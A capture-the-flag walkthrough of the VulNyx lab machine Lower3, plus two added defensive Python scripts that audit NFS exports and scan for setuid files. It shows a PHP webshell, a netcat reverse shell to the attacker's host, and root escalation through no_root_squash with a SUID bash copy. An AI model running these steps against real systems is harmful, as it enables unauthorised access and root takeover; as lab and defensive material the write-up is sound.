Information

Lower3 is a low-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.57
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-05 11:36 CEST
Nmap scan report for 192.168.1.57
Host is up (0.000090s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
34067/tcp open  unknown
39207/tcp open  unknown
47695/tcp open  unknown
50839/tcp open  unknown
 nmap -sVC -p22,80,111,2049,34067,39207,47695,50839 192.168.1.57
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-05 11:37 CEST
Nmap scan report for 192.168.1.57
Host is up (0.00067s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http     Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42155/tcp6  mountd
|   100005  1,2,3      44027/udp   mountd
|   100005  1,2,3      50839/tcp   mountd
|   100005  1,2,3      56064/udp6  mountd
|   100021  1,3,4      33427/udp6  nlockmgr
|   100021  1,3,4      39207/tcp   nlockmgr
|   100021  1,3,4      41153/tcp6  nlockmgr
|   100021  1,3,4      46859/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
34067/tcp open  mountd   1-3 (RPC #100005)
39207/tcp open  nlockmgr 1-4 (RPC #100021)
47695/tcp open  mountd   1-3 (RPC #100005)
50839/tcp open  mountd   1-3 (RPC #100005)

Shell (www-data)

80/TCP (HTTP)

Site

Directory Brute Force

 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.57
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.57
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 277]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================

2049/TCP (NFS)

List

I list the exports: the /var/www/html folder is available to be mounted from a remote host

 showmount -e 192.168.1.57
Export list for 192.168.1.57:
/var/www/html *

Mount

Mounting the /var/www/html folder reveals the website's index.html

 cd /dev/shm
 mkdir nfs
 mount -t nfs 192.168.1.57:/var/www/html /dev/shm/nfs -o nolock
 cd nfs
 ls -l
.rw------- kali kali 10 KB Mon Jun 12 21:41:37 2023  index.html

Reverse Shell

I create a PHP webshell in my local folder /dev/shm/nfs, which actually points to the remote folder /var/www/html

 echo -n '<?php system($_GET["cmd"]); ?>' > cmd.php
 cat cmd.php ;echo
<?php system($_GET["cmd"]); ?>

I get a shell as the user low

 curl -sX GET "http://192.168.1.57/cmd.php?cmd=nc+192.168.1.5+443+-e+/bin/sh"
 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.57] 54300
id ; hostname
uid=1000(low) gid=1000(low) groups=1000(low)
lower3

Privilege Escalation

Enumeration

Config Files

I review the NFS configuration file /etc/exports and it contains no_root_squash

low@lower3:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/www/html/       *(rw,sync,insecure,no_root_squash,no_subtree_check)
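Added example, not code from the original write-up: a small Python audit of /etc/exports that flags the option combinations behind this finding. The export line from the box is reproduced as a constructed sample next to a hardened version of the same share; the client 192.168.1.5 in the hardened line is only an illustrative host, and the Export/Finding dataclasses and the option descriptions are mine, not exports(5) text.

```python
"""Audit an /etc/exports file for options that let an NFS client act as root.

Added example, not code from the original write-up. Parses the exports(5)
layout "<path> <client>(opt,...) [<client>(opt,...) ...]" and reports the
combinations that made the Lower3 share abusable.
"""
import re
from dataclasses import dataclass

# Constructed sample: the share exactly as found on the target.
WEAK_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/var/www/html/       *(rw,sync,insecure,no_root_squash,no_subtree_check)
"""

# Constructed sample: the same share with root squashed, read-only and
# limited to a single client (192.168.1.5 is just an illustrative host).
HARDENED_EXPORTS = """\
/var/www/html/       192.168.1.5(ro,sync,root_squash,no_subtree_check)
"""


@dataclass
class Export:
    path: str
    client: str
    options: list


@dataclass
class Finding:
    path: str
    client: str
    code: str
    detail: str


# One client entry: a non-space client spec optionally followed by "(opts)".
ENTRY_RE = re.compile(r"(\S+?)(?:\((.*?)\))?(?=\s|$)")


def parse_exports(text):
    """Return one Export per (path, client) pair; comments and blanks are skipped."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        if not rest:
            # A path with no client spec is exported to everyone with default options.
            exports.append(Export(path, "*", []))
            continue
        for m in ENTRY_RE.finditer(rest):
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            exports.append(Export(path, m.group(1), opts))
    return exports


def audit(exports):
    """Flag the option combinations that matter for the no_root_squash abuse."""
    findings = []
    for e in exports:
        opts = set(e.options)
        wildcard = e.client == "*"   # bare "*" means every host may mount
        if "no_root_squash" in opts:
            findings.append(Finding(e.path, e.client, "no_root_squash",
                                    "uid 0 on the client is uid 0 on the server"))
        if "insecure" in opts:
            findings.append(Finding(e.path, e.client, "insecure",
                                    "requests accepted from unprivileged source ports"))
        if wildcard:
            findings.append(Finding(e.path, e.client, "wildcard_client",
                                    "any host that can reach port 2049 may mount"))
        if wildcard and "rw" in opts:
            findings.append(Finding(e.path, e.client, "rw_wildcard",
                                    "world-writable export: anyone can plant files"))
    return findings


def audit_text(text):
    """Parse and audit in one call; returns the list of findings."""
    return audit(parse_exports(text))


if __name__ == "__main__":
    for name, text in (("weak", WEAK_EXPORTS), ("hardened", HARDENED_EXPORTS)):
        print(f"[{name}] {len(audit_text(text))} finding(s)")
        for f in audit_text(text):
            print(f"  {f.path} {f.client}: {f.code} - {f.detail}")
```

Running it against the two samples prints four findings for the weak line (no_root_squash, insecure, wildcard client, rw on a wildcard) and none for the hardened one; the default on a Linux NFS server is root_squash, so the fix on this box is simply removing no_root_squash and narrowing the client list.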

Abuse

Because the NFS configuration has no_root_squash, arbitrary actions can be performed inside the mount as the root user in a privileged context

low@lower3:/$ cd /var/www/html/
low@lower3:/var/www/html$ cp /usr/bin/bash .

From the mount I give the bash binary SUID permissions (4755) and change its owner to root

 chown root:root bash
 chmod 4755 bash

On the victim I run bash -p and become the root user

low@lower3:/var/www/html$ ./bash -p
bash-5.1# id ; hostname
uid=1000(low) gid=1000(low) euid=0(root) groups=1000(low)
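Added example, not from the original write-up: the SUID copy of bash planted through the export is exactly what a periodic scan of exported directories should catch. This Python script walks a directory tree, reports regular files carrying the setuid or setgid bit, and builds a constructed stand-in for /var/www/html in a temporary directory (index.html, a harmless asset and a fake `bash` with mode 4755) so it runs offline; in the constructed tree the files belong to the current user rather than root, so the owner is reported rather than required.

```python
"""Detect setuid/setgid files inside an NFS-exported directory.

Added example, not code from the original write-up. A root-owned setuid
binary has no business in a web root; scanning exported paths for the bit
(or an auditd watch on them) surfaces the abuse shown in the write-up.
"""
import os
import shutil
import stat
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class SuidHit:
    path: str
    mode: str   # permission bits in octal, e.g. "4755"
    uid: int
    gid: int


def scan_for_suid(root):
    """Return every regular file under root that carries S_ISUID or S_ISGID."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)          # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue                      # symlinks/sockets cannot carry a usable setuid bit
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(SuidHit(full, format(stat.S_IMODE(st.st_mode), "o"),
                                    st.st_uid, st.st_gid))
    return sorted(hits, key=lambda h: h.path)


def build_sample_export():
    """Construct a stand-in for /var/www/html in a temp dir and return its path.

    Files are owned by the current user (not root), but the copied shell gets
    the same 4755 mode the write-up sets; that bit is what the scan keys on.
    """
    root = tempfile.mkdtemp(prefix="nfs-export-")
    os.mkdir(os.path.join(root, "assets"))
    samples = [
        ("index.html", b"<html>It works</html>\n", 0o600),
        (os.path.join("assets", "app.js"), b"console.log('hi');\n", 0o644),
        ("bash", b"#!/bin/sh\n", 0o4755),   # the planted copy
    ]
    for rel, content, mode in samples:
        p = os.path.join(root, rel)
        with open(p, "wb") as f:
            f.write(content)
        os.chmod(p, mode)
    return root


def suid_basenames(root):
    """Convenience for callers/tests: just the file names that hit."""
    return [os.path.basename(h.path) for h in scan_for_suid(root)]


if __name__ == "__main__":
    export = build_sample_export()
    try:
        for h in scan_for_suid(export):
            owner = "root-owned" if h.uid == 0 else f"uid {h.uid}"
            print(f"setuid/setgid file in export: {h.path} mode {h.mode} ({owner})")
    finally:
        shutil.rmtree(export)
```

On a real server the paths to scan come from the export list (showmount -e or /etc/exports), and any hit owned by uid 0 in a directory writable through NFS is a strong indicator of the no_root_squash chain above.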

Flags

Now as the root user I can read the user.txt and root.txt flags

bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
da0a4***************************
eed0b***************************

This concludes the resolution of the Lower3 machine.

Happy Hacking!